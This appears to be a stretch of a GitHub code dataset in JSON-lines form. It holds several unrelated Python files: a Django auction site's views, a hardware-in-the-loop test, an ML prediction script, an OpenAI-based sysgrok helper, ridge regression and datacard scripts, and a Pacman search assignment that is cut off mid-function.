Comment\nfrom decimal import Decimal \nfrom django.contrib import messages \nfrom django.db.models import Count\n\n\n\ndef index(request):\n return render(request, \"auctions/index.html\", {\n \"active_listings\" : Listing.objects.all()\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches 
confirmation\n        password = request.POST[\"password\"]\n        confirmation = request.POST[\"confirmation\"]\n        if password != confirmation:\n            return render(request, \"auctions/register.html\", {\n                \"message\": \"Passwords must match.\"\n            })\n\n        # Attempt to create new user\n        try:\n            user = User.objects.create_user(username, email, password)\n            user.save()\n        except IntegrityError:\n            return render(request, \"auctions/register.html\", {\n                \"message\": \"Username already taken.\"\n            })\n        login(request, user)\n        return HttpResponseRedirect(reverse(\"index\"))\n    else:\n        return render(request, \"auctions/register.html\")\n\nclass CreateNewListingForm(forms.Form):\n    title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'autofocus': 'autofocus'}))\n    description = forms.CharField(widget=forms.Textarea)\n    starting_bid = forms.DecimalField(label=\"Starting Bid\")\n    category = forms.CharField(label=\"Category\")\n    image_url = forms.CharField(label=\"Image URL\")\n\nclass see_listing(forms.Form):\n    title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'autofocus': 'autofocus'}))\n    description = forms.CharField(widget=forms.Textarea)\n    starting_bid = forms.DecimalField(label=\"Starting Bid\")\n    category = forms.CharField(label=\"Category\")\n    image_url = forms.CharField(label=\"Image URL\")\n\n#class CommentForm(forms.Form):\n   # comment_text = forms.CharField(widget=forms.Textarea(attrs={'rows': 3}), required=True)\nclass CommentForm(forms.Form):\n    comment_text = forms.CharField(\n        widget=forms.Textarea(\n            attrs={\n                'rows': 3,\n                'placeholder': 'Make comment' # Add this\n            }\n        ),\n        label=\"\",\n        required=True\n    )\n\ndef create_listing(request):\n    if request.method == 'GET':\n        form = CreateNewListingForm()\n        return render(request, 'auctions/clisting.html', {'form': form})\n    else:\n        if request.method == 'POST':\n            form = CreateNewListingForm(request.POST)\n            # Validate form data\n            if form.is_valid():\n                # Save the new listing\n                new_listing = Listing(\n                    title=form.cleaned_data['title'],\n                    description=form.cleaned_data['description'],\n                    min_start_bid=form.cleaned_data['starting_bid'],\n                    category=form.cleaned_data['category'],\n                    image_url=form.cleaned_data['image_url'],\n                    listing_creator= request.user,\n                    active = True\n                )\n                new_listing.save()\n\n                # Redirect to the index page (or another page of your choice)\n                return HttpResponseRedirect(reverse(\"index\"))\n\ndef listing_detail(request, listing_id):\n\n    listing = Listing.objects.get(pk=listing_id) \n\n    if listing.winner is None: # if listing.winner is NOT NONE, then the listing.winner has already been set, no need to sort the bids again\n        winning_bid = listing.highest_bid() \n        if winning_bid is not None: # if winning_bid is None, that means listing.winner hasn't been set, it is currently None, and that is ok. 
\n            listing.winner = winning_bid.user \n            listing.save()\n\n    if listing.winner == request.user: # if the current user won\n        context = {\n            'listing': listing,\n            'comment_form' : CommentForm(),\n            'winner_string': \"Congrats, you are the winner of this auction!\"\n        }\n    elif listing.winner is not None: # if we need to inform about another user winning\n        context = {\n            'listing': listing,\n            'comment_form' : CommentForm(),\n            'winner_string': f\"{listing.winner.username} has won the auction!\"\n        }\n    elif listing.winner is None and listing.active is False:\n        context = {\n            'listing': listing,\n            'comment_form' : CommentForm(),\n            'winner_string': \"The auction owner decided to close the auction before a single bid has been made!\"\n        } \n    else: # if no one is currently the winner\n        context = {'listing': listing,\n        'comment_form' : CommentForm()\n        }\n    \n    return render(request, 'auctions/listing.html', context)\n\ndef update_watchlist(request, listing_id):\n    listing = Listing.objects.get(pk=listing_id) \n    if request.method == 'POST':\n        if request.POST.get('watchlist') == \"yes\":\n            request.user.watchlist.add(listing)\n        else:\n            request.user.watchlist.remove(listing)\n    return redirect('listing_detail', listing_id=listing.id)\n\ndef place_bid(request, listing_id):\n    listing = Listing.objects.get(pk=listing_id)\n    if request.method == 'POST' and request.user.is_authenticated:\n        bid_amount = Decimal(request.POST['bid_amount'])\n\n        # We get the highest bid using the highest_bid() method. If no bids have been made yet, \n        # it will return None, and we'll consider the minimum start bid as the highest bid.\n        highest_bid = listing.highest_bid()\n        if highest_bid is not None:\n            highest_bid_amount = highest_bid.bid_ammount\n        else:\n            highest_bid_amount = listing.min_start_bid\n\n        # We check if the bid is valid (i.e., greater than the current highest bid and the listing is active).\n        if bid_amount > highest_bid_amount and listing.active:\n            # Instead of updating a field in the Listing model, we now create a new Bid object.\n            bid = Bid(listing=listing, bid_ammount=bid_amount, user=request.user)\n            bid.save()\n            messages.success(request, \"Congrats! 
You are currently the highest bidder!\")\n else:\n messages.error(request, 'Your bid must be higher than the current highest bid and the minimum bid.')\n return redirect('listing_detail', listing_id=listing.id)\n\ndef make_comment(request, listing_id):\n listing = Listing.objects.get(pk=listing_id)\n\n if request.method == 'POST' and request.user.is_authenticated:\n form = CommentForm(request.POST)\n\n if form.is_valid():\n comment_text = form.cleaned_data.get('comment_text')\n\n if comment_text.strip() == '':\n messages.error(request, 'You cannot submit an empty comment.')\n else:\n comment = Comment(listing=listing, text=comment_text.strip(), user=request.user)\n comment.save()\n else:\n # This else branch is for cases where the form is not valid\n messages.error(request, 'There was an error with your comment submission.')\n \n return redirect('listing_detail', listing_id=listing.id)\n\ndef close_auction(request,listing_id):\n if request.method == 'POST':\n listing = Listing.objects.get(pk=listing_id)\n if request.user == listing.listing_creator: # Check if the user is the creator of the listing\n listing.active = False # Set the listing as inactive\n listing.save() # Save the changes\n messages.success(request, \"You have now closed the auction!\")\n else:\n messages.error(request, \"Only the auction creator can close the auction.\")\n return redirect('listing_detail', listing_id=listing.id) \n\ndef watchlist(request):\n if request.user.is_authenticated:\n watchlist_items = request.user.watchlist.all()\n context = {'watchlist_items': watchlist_items}\n return render(request, 'auctions/watchlist.html', context)\n else:\n return redirect('login') # redirect to login page if user is not authenticated\n\ndef categories(request):\n categories = Listing.objects.values('category').annotate(total=Count('category')).order_by('category')\n context = {'categories': categories}\n return render(request, 'auctions/categories.html', context)\n\ndef category_listings(request, category_name):\n listings = Listing.objects.filter(category=category_name, active=True)\n context = {'listings': listings, 'category_name': category_name}\n return render(request, 'auctions/category_listings.html', context)\n","repo_name":"calcmaster7/hack_bay","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5429591309","text":"from os import sys, path \nsys.path.append(path.join(path.dirname(path.dirname(path.abspath(__file__))), 'hil'))\nfrom hil import HIL\nimport time\n\ndef test_brake_fail(hil):\n hil.start_test(test_brake_fail.__name__)\n\n fstp = hil.get_component(\"FrontESTOP\")\n bots = hil.get_component(\"BOTS\")\n btn = hil.get_component(\"StartButton\")\n do = hil.get_component(\"DigiOut\")\n di = hil.get_component(\"DigiIn\")\n ai = hil.get_component(\"AnalogIn\")\n\n for i in range(10):\n btn.state = 0\n time.sleep(0.01)\n btn.state = 1\n time.sleep(0.01)\n\n ct = 100\n\n a = time.perf_counter()\n for i in range(ct):\n do.state = 1\n b = time.perf_counter()\n for i in range(ct):\n l = di.state\n c = time.perf_counter()\n for i in range(ct):\n l = ai.state\n d = time.perf_counter()\n print(f\"Avg Write time: {1000 * (b-a) / ct} ms\")\n print(f\"Avg Read time: {1000 * (c-b)/ct} ms\")\n print(f\"Avg Analog Read time: {1000 *(d-c)/ct} ms\")\n\n print(f\"State: {ai.state}, Set: {do.state}\")\n do.state = 0\n print(f\"State: {ai.state}, Set: {do.state}\")\n\n 
fstp.state = 1\n bots.state = 1\n\n time.sleep(0.1)\n hil.check(False, \"First\")\n hil.check(True, \"Second\")\n\n fstp.state = 0\n\n time.sleep(0.1)\n\n bots.state = 0\n\n hil.end_test()\n\n\nif __name__ == \"__main__\":\n hil = HIL()\n hil.load_config(\"config_test.json\")\n test_brake_fail(hil)\n hil.shutdown()\n","repo_name":"PurdueElectricRacing/HIL-Testing","sub_path":"scripts/test_test1.py","file_name":"test_test1.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36565553222","text":"import sys\nimport logging\nimport pickle\nimport pandas as pd\nfrom data.prepare_data import prepare_data\n\nlogging.basicConfig(filename='/home/skye/Documents/Programming/sample-sklearn-ml-workflow.log',\n filemode='w',\n format='%(asctime)s: %(name)s - %(levelname)s - %(message)s')\n\ndef get_predictions( data_path=\"\", model_path=\"\"):\n champion_path = \"{0}{1}\".format(model_path, 'champion.pkl')\n print(\"0 \"+champion_path)\n champion = pickle.load(open(champion_path, 'rb'))\n\n # Future extension: Data path or data retrieval process for consistently updated data\n _, _, X_test, test_id = prepare_data(data_path)\n\n # Future extension: Write to another file, database, etc.\n print(champion.predict(X_test))\n submission_path = \"{0}{1}\".format(model_path, \"submission.csv\")\n print(submission_path)\n\n submission = pd.DataFrame({'PassengerId': test_id, 'Survived': champion.predict(X_test)})\n submission.to_csv(submission_path)\n\nif __name__ == '__main__':\n print('Version is', sys.version)\n print('sys.argv is', sys.argv)\n\n get_predictions(\"/home/skye/Documents/Programming/sample-sklearn-ml-workflow/data/\",\n \"/home/skye/Documents/Programming/sample-sklearn-ml-workflow/output/\")\n\n\n #try:\n # get_predictions(sys.argv[1], sys.argv[2])\n #except:\n # get_predictions()","repo_name":"SkYeJustis/sample-sklearn-ml-workflow","sub_path":"core/get_predictions.py","file_name":"get_predictions.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17459217447","text":"import sys\nimport logging\n\nfrom dataclasses import dataclass\n\nimport openai\nimport tiktoken\n\n\n@dataclass\nclass LLMConfig:\n model: str\n temperature: float\n max_concurrent_queries: int\n output_format: str\n\n\nconfig = None\n\n\ndef set_config(c):\n global config\n logging.debug(f\"Setting LLM config to: {c}\")\n config = c\n\n\ndef get_config():\n logging.debug(f\"Retrieved LLM config: {config}\")\n return config\n\n\ndef set_output_format(format):\n global config\n logging.debug(f\"Setting output format to {format}\")\n config.output_format = format\n\n\ndef get_output_format():\n logging.debug(f\"Retrieved output format: {config.output_format}\")\n return config.output_format\n\n\ndef set_model(m):\n global config\n logging.debug(f\"Setting model to {m}\")\n config.model = m\n\n\ndef get_model():\n logging.debug(f\"Retrieved model: {config.model}\")\n return config.model\n\n\ndef set_temperature(t):\n global config\n logging.debug(f\"Setting temperature to {t}\")\n config.temperature = t\n\n\ndef get_temperature():\n logging.debug(f\"Retrieved temperature: {config.temperature}\")\n return config.temperature\n\n\ndef set_max_concurrent_queries(m):\n global config\n logging.debug(f\"Setting max concurrent queries to {m}\")\n config.max_concurrent_queries = m\n\n\ndef get_max_concurrent_queries():\n 
logging.debug(f\"Retrieved max concurrent queries {config.max_concurrent_queries}\")\n return config.max_concurrent_queries\n\n\ndef get_model_max_tokens():\n model = get_model()\n if model == \"gpt-3.5-turbo\":\n return 4096\n elif model == \"gpt-4\":\n return 8192\n elif model == \"gpt-4-32k\":\n return 32768\n else:\n logging.error(f\"Unknown model: {model}\")\n sys.exit(-1)\n\n\ndef get_base_messages():\n messages = [\n {\n \"role\": \"system\",\n \"content\": \"\"\"You are sysgrok, a helpful assistant for performance analysis and optimisation\n of software. Answer as concisely as possible. \"\"\"\n }]\n\n output_format = get_output_format()\n if output_format:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"You must format your output as {output_format}\"\n })\n\n return messages\n\n\ndef get_token_count(data):\n enc = tiktoken.encoding_for_model(get_model())\n return len(enc.encode(data))\n\n\n# Global record of the character to token ratio for the current model. Allows us to\n# calculate it once and then reuse it as necessary.\n_command_char_token_ratio = None\n\n\ndef get_command_char_token_ratio():\n \"\"\"Returns a character:token ratio for output from Linux command line tools. This is\n calculated by applying tiktoken to sample output from the `top` command.\n \"\"\"\n\n global _command_char_token_ratio\n if _command_char_token_ratio:\n logging.debug(f\"Returning character token ratio for Linux commands: {_command_char_token_ratio}\")\n return _command_char_token_ratio\n\n top_output = \"\"\"top - 13:23:34 up 3:37, 1 user, load average: 0.00, 0.00, 0.00\nTasks: 106 total, 1 running, 105 sleeping, 0 stopped, 0 zombie\n%Cpu(s): 0.0 us, 3.1 sy, 0.0 ni, 93.8 id, 3.1 wa, 0.0 hi, 0.0 si, 0.0 st\nMiB Mem : 3920.5 total, 2199.4 free, 253.8 used, 1467.3 buff/cache\nMiB Swap: 0.0 total, 0.0 free, 0.0 used. 
3388.5 avail Mem\n\n PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND\n 1 root 20 0 166192 11780 8472 S 0.0 0.3 0:07.98 systemd\n 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd\n 3 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_gp\n 4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_par_gp\n 5 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 slub_flushwq\n 6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 netns\n 8 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H-kblockd\n 10 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq\n 11 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_tasks_rude_kthread\n 12 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_tasks_trace_kthread\n 13 root 20 0 0 0 0 S 0.0 0.0 0:00.15 ksoftirqd/0\n 14 root 20 0 0 0 0 I 0.0 0.0 0:00.31 rcu_sched\n 15 root rt 0 0 0 0 S 0.0 0.0 0:00.08 migration/0\n 16 root -51 0 0 0 0 S 0.0 0.0 0:00.00 idle_inject/0\n 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0\n 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1\n 20 root -51 0 0 0 0 S 0.0 0.0 0:00.00 idle_inject/1\n 21 root rt 0 0 0 0 S 0.0 0.0 0:00.44 migration/1\n 22 root 20 0 0 0 0 S 0.0 0.0 0:00.13 ksoftirqd/1\n 24 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/1:0H-events_highpri\n 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs\n 26 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 inet_frag_wq\n 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kauditd\n 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd\n 29 root 20 0 0 0 0 I 0.0 0.0 0:00.20 kworker/u30:1-events_unbound\n 31 root 20 0 0 0 0 S 0.0 0.0 0:00.00 oom_reaper\n 32 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 writeback\n 33 root 20 0 0 0 0 S 0.0 0.0 0:00.52 kcompactd0\n 34 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd\n 35 root 39 19 0 0 0 S 0.0 0.0 0:00.00 khugepaged\n 36 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kintegrityd\n 37 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kblockd\n 38 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 blkcg_punt_bio\n 40 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xen-balloon\n 41 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 tpm_dev_wq\n 42 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 ata_sff\n 43 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 md\n 44 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 edac-poller\"\"\"\n\n _command_char_token_ratio = len(top_output) / get_token_count(top_output)\n logging.debug(f\"Returning character token ratio for Linux commands: {_command_char_token_ratio}\")\n return _command_char_token_ratio\n\n\n# Global record of the character to token ratio for the current model for English prose. Allows us to\n# calculate it once and then reuse it as necessary.\n_prose_char_token_ratio = None\n\n\ndef get_prose_char_token_ratio():\n \"\"\"Returns a character:token ratio for English prose. This is calculated by applying tiktoken to\n sample text (which is actually GPT-4 generated text in a command summarisation use case).\n \"\"\"\n\n global _prose_char_token_ratio\n if _prose_char_token_ratio:\n logging.debug(f\"Returning prose token ratio for English prose: {_prose_char_token_ratio}\")\n return _prose_char_token_ratio\n\n sample_prose = \"\"\"The system has been up for 5 hours and 15 minutes with 0 users logged in. The load\n average is low (0.09, 0.04, 0.01), indicating that the system is not under heavy load. The CPU usage\n is mostly idle (99.36%), with minimal user (0.17%), system (0.12%), and I/O wait (0.29%) usage. There\n are no significant performance or stability issues detected. Memory usage is also in a healthy state,\n with 1983 MB free out of 3920 MB total, and 3399 MB available. Swap usage is at 0 MB, indicating that\n the system is not under memory pressure. 
The top processes running on the system include systemd,\n snapd, amazon-ssm-agent, and multipathd, among others. No processes are consuming a significant amount\n of CPU or memory resources. In conclusion, the system is currently stable and not experiencing any\n performance issues.\"\"\"\n\n _prose_char_token_ratio = len(sample_prose) / get_token_count(sample_prose)\n logging.debug(f\"Returning prose token ratio for Linux commands: {_prose_char_token_ratio}\")\n return _prose_char_token_ratio\n\n\ndef get_chat_completion_args(messages, stream=False):\n kwargs = {\n \"temperature\": get_temperature(),\n \"messages\": messages,\n \"stream\": stream\n }\n\n if openai.api_type == \"azure\":\n kwargs[\"deployment_id\"] = get_model()\n elif openai.api_type == \"open_ai\":\n kwargs[\"model\"] = get_model()\n else:\n logging.error(f\"Unknown API type: {openai.api_type}\")\n sys.exit(1)\n\n return kwargs\n\n\ndef get_llm_response(prompt):\n messages = get_base_messages()\n messages.append({\n \"role\": \"user\",\n \"content\": prompt\n })\n response = openai.ChatCompletion.create(\n **get_chat_completion_args(messages)\n )\n\n return response[\"choices\"][0][\"message\"][\"content\"]\n\n\ndef print_streamed_llm_response(prompt, conversation=None):\n response = []\n\n if not conversation:\n conversation = get_base_messages()\n\n conversation.append({\n \"role\": \"user\",\n \"content\": prompt\n })\n\n completion = openai.ChatCompletion.create(\n **get_chat_completion_args(conversation, stream=True)\n )\n\n wrote_reply = False\n for chunk in completion:\n delta = chunk[\"choices\"][0][\"delta\"]\n if \"content\" not in delta:\n continue\n content = delta[\"content\"]\n sys.stdout.write(content)\n response.append(content)\n wrote_reply = True\n\n if wrote_reply:\n sys.stdout.write(\"\\n\")\n\n conversation.append({\"role\": \"assistant\", \"content\": \"\".join(response)})\n\n return conversation\n\n\ndef chat(conversation):\n print(\"--- Start chat with the LLM ---\")\n print(\"Input 'c' to exit the chat and continue operation\")\n print(\"Input 'q' to exit the chat and exit the copilot\")\n user_input = \"\"\n\n while True:\n user_input = input(\"chat> \")\n if user_input == \"c\":\n print(\"--- End chat with the LLM ---\")\n return conversation\n elif user_input == \"q\":\n print(\"--- End chat with the LLM ---\")\n sys.exit(0)\n\n conversation = print_streamed_llm_response(user_input, conversation)\n","repo_name":"elastic/sysgrok","sub_path":"sgrk/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":10598,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"21156520297","text":"import numpy as np\nimport csv\nimport sys\nimport scipy\nfrom sklearn.preprocessing import normalize\nnp.set_printoptions(precision=2)\n\nlambdaa = float(sys.argv[1])\nsigma2 = float(sys.argv[2])\nX = sys.argv[3]\ny = sys.argv[4]\ntestData = sys.argv[5]\n\nX_train = np.loadtxt(X, delimiter=\",\")\n#X_train = (X_train - np.mean(X_train, axis=0)) / np.std(X_train, axis=0)\ny_train = np.loadtxt(y, delimiter=\",\")\nX_test = np.loadtxt(testData, delimiter=\",\")\n#X_test = (X_test - np.mean(X_test, axis=0)) / np.std(X_test, axis=0)\n\nd = X_train.shape[1]\nidentityMatrix = np.eye(d)\n\nw_rr = np.matmul(np.matmul(np.linalg.inv(lambdaa * identityMatrix + np.matmul(X_train.T, X_train)),X_train.T), y_train)\n\nnp.savetxt(\"wRR\" +\"_\"+sys.argv[1] + \".csv\", w_rr,delimiter=\",\")\n\n\n## Part 2\ncapSigma = np.linalg.inv(lambdaa * identityMatrix + 
np.matmul(X_train.T, X_train)/sigma2)\nmu = np.matmul(np.matmul(np.linalg.inv(lambdaa * sigma2 * identityMatrix + np.matmul(X_train.T, X_train)), X_train.T),y_train)\n\n# Form predictive distribution p(y0|x0, y, X) for all unmeasured x0 element of D\nmu_new = np.matmul(X_test, mu)\nsigma2_new = np.zeros((len(X_test),1))\nfor i in xrange(len(X_test)):\n sigma2_new[i,0] = np.matmul(np.matmul(X_test[i,:], capSigma), X_test[i,:].T)\n# find Data point with maximum variance \nindex = np.argsort(-1 * sigma2_new,0)[0:10]\nindexList = index.flatten().tolist()\n\nwith open(\"active\" + \"_\" + sys.argv[1] + \"_\" +sys.argv[2] + \".csv\" , 'wb') as myfile:\n wr = csv.writer(myfile)\n wr.writerow(indexList)\n\n \n \n","repo_name":"saurabh2086/MachineLearning_ColumbiaX","sub_path":"LinearRegression/hw1_regression.py","file_name":"hw1_regression.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4328391330","text":"#! /usr/bin/python \n\nimport os\nimport sys\nimport math\nimport ROOT\nfrom Config import *\n\nSRbins = SRBins #make sure the bin number is consistent with the number of region histogram bins\n\n\nfor sig in signals:\n\n txtline = []\n txtline.append(\"echo 'Making datacards from the text files'\\n\")\n for b in range(SRBins):\n txtline.append(\"python MakeCard.py --bins %i --sig %s\\n\"%(b, sig))\n txtline.append(\"echo 'Making datacards completed'\\n\")\n fsh = open(\"MakeDataCardScript.sh\", \"w\")\n fsh.write(''.join(txtline))\n fsh.close()\n os.system('chmod 744 MakeDataCardScript.sh')\n os.system('./MakeDataCardScript.sh')\n os.system('ls datacard_Bin*.txt > ls.txt')\n\n df = {}\n with open('ls.txt','r') as ifile:\n for line in ifile:\n line = line.rstrip()\n k = line.replace(\"datacard_Bin\",\"\")\n k = k.replace(\".txt\",\"\")\n df[k]= line\n\n cardcomb = []\n for b in range(SRBins):\n lt = SRBinLabelList[b]+\"=\"+df[SRBinLabelList[b]]\n cardcomb.append(lt)\n\n bsline = []\n bsline.append(\"echo 'combining datacards for signal %s'\\n\"%sig)\n bsline.append(\"combineCards.py \"+\" \".join(cardcomb)+\" > CCDataCard_T2tt_\"+sig+\".txt\\n\")\n bsline.append(\"echo 'combining datacards completed'\\n\")\n bsline.append(\"rm datacard_Bin*.txt\\n\")\n bsline.append(\"echo 'moving combined datacards to DataCard dir'\\n\")\n bsline.append(\"mv CCDataCard_T2tt_*.txt DataCard/\\n\")\n bsline.append(\"echo 'combine datacard process completed'\\n\")\n bsline.append(\"echo '.....................'\\n\")\n bsline.append(\"echo '.....................'\\n\")\n\n bsh = open(\"CombineDataCardScript.sh\", \"w\")\n bsh.write(''.join(bsline))\n bsh.close()\n os.system('chmod 744 CombineDataCardScript.sh')\n os.system('./CombineDataCardScript.sh')\n","repo_name":"1LStopBudapest/LimitSetting","sub_path":"DataCardScript.py","file_name":"DataCardScript.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21663803265","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# 
(denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nfrom cmath import exp\nfrom email import utils\nfrom inspect import CORO_SUSPENDED\nimport util\n\nclass SearchProblem:\n    \"\"\"\n    This class outlines the structure of a search problem, but doesn't implement\n    any of the methods (in object-oriented terminology: an abstract class).\n\n    You do not need to change anything in this class, ever.\n    \"\"\"\n\n    def getStartState(self):\n        \"\"\"\n        Returns the start state for the search problem.\n        \"\"\"\n        util.raiseNotDefined()\n\n    def isGoalState(self, state):\n        \"\"\"\n        state: Search state\n\n        Returns True if and only if the state is a valid goal state.\n        \"\"\"\n        util.raiseNotDefined()\n\n    def getSuccessors(self, state):\n        \"\"\"\n        state: Search state\n\n        For a given state, this should return a list of triples, (successor,\n        action, stepCost), where 'successor' is a successor to the current\n        state, 'action' is the action required to get there, and 'stepCost' is\n        the incremental cost of expanding to that successor.\n        \"\"\"\n        util.raiseNotDefined()\n\n    def getCostOfActions(self, actions):\n        \"\"\"\n        actions: A list of actions to take\n\n        This method returns the total cost of a particular sequence of actions.\n        The sequence must be composed of legal moves.\n        \"\"\"\n        util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n    \"\"\"\n    Returns a sequence of moves that solves tinyMaze. For any other maze, the\n    sequence of moves will be incorrect, so only use this for tinyMaze.\n    \"\"\"\n    from game import Directions\n    s = Directions.SOUTH\n    w = Directions.WEST\n    return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n    #Markel\n    #Creamos una clase Nodo que contenga los siguientes datos\n    # coordenada: la coordenada del propio nodo\n    # camino: el camino que debe realizar el pacman para llegar a él\n    class Nodo:\n        def __init__(self , coordenada, camino=[]):\n            self.coordenada = coordenada\n            self.camino = camino\n        \n        def print(self):\n            #Metodo de prueba para ir comprobando si funciona\n            #Este metodo se asemeja a toString() en Java\n            print(\"coordenada: \"+str(self.coordenada))\n            print()\n            print(\"camino: \"+str(self.camino))\n    \n    #Obtenemos la coordenada inicial\n    coordenadaInicial = problem.getStartState()\n    #Creamos un Nodo con dicha coordenada con la clase que habiamos creado\n    nodoInicial = Nodo(coordenada= coordenadaInicial)\n    #Creamos una pila para ir almacenando los Nodos por visitar\n    sinExplorar = util.Stack()\n    #Introducimos el nodoInicial a la pila\n    sinExplorar.push(nodoInicial)\n    #Creamos una lista tipo set para ir almacenando las coordenadas visitadas\n    explorados = set() #En un set es imposible que se repitan elementos\n\n\n    while not sinExplorar.isEmpty(): \n        #Mientras no se termine la pila\n        nodoActual = sinExplorar.pop()\n        #Vamos sacando nodos de uno en uno \n        if nodoActual.coordenada not in explorados:\n            #Y comprobamos si el nodo que hemos sacado ya lo hemos visitado\n            explorados.add(nodoActual.coordenada)\n            #Si no es asi, lo introducimos a el set marcandolo como visitado\n            if problem.isGoalState(nodoActual.coordenada):\n                #En caso de que el nodo que estemos analizando sea el final del camino hacemos return\n                return nodoActual.camino\n            vecinos = problem.getSuccessors( nodoActual.coordenada )\n            #En caso contrario vamos 
sacando sus nodos vecinos\n for vecino in vecinos:\n #Por cada nodo vecino que tenga\n #Vamos a completar el camino hacia ese nodo uniendo el camino que traia el anterior\n #con la direccion que trae este\n caminoNuevo = nodoActual.camino + [vecino[1]]\n #y con este camino y la coordenada, crearemos un nuevoNodo \n nodoNuevo = Nodo(coordenada = vecino[0], camino = caminoNuevo)\n #Finalmente este nuevo nodo lo meteremos en la pila para posteriormente analizarlo\n sinExplorar.push(nodoNuevo)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return nodoActual.camino \n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n \n fringe = util.Queue() #frontera (sin explorar), candidatos\n closed = set() #explorados\n #lista_direcciones = [] #movimientos para el pacman\n \n #primer estado, le meto las coordenadas iniciales y \n #la lista de direcciones por las que alcanzar esa \n #posicion. Al principio está vacía ya que es el nodo\n #inicial\n\n fringe.push((problem.getStartState(), []))\n \n #mientras tengamos frontera:\n while not fringe.isEmpty():\n \n \n actual_estado, actual_camino = fringe.pop() #sacamos la coordenada y\n #el camino para llegar a ella\n \n if problem.isGoalState(actual_estado): #si hemos llegado al punto blanco...\n return actual_camino\n \n #si no tenemos explorada la coordenada actual (esto evita explorar dos veces la misma posición)\n elif actual_estado not in closed:\n closed.add(actual_estado) #añadimos a explorados la coordenada\n sucesores = problem.getSuccessors(actual_estado) #sacamos los de alrededor\n for coord, movimiento, coste in sucesores: #de todos los de alrededor...\n #if coord not in closed: #si cada coordenada no está explorada\n nuevalistadirecciones = actual_camino + [movimiento] #la añadimos a la lista de \n #movimientos que vamos actualizando sin parar\n fringe.push((coord, nuevalistadirecciones)) #metemos en la cola la coordenada \n # y el camino para llegar a ella\n vacio=tuple() \n return vacio\n\n #util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n 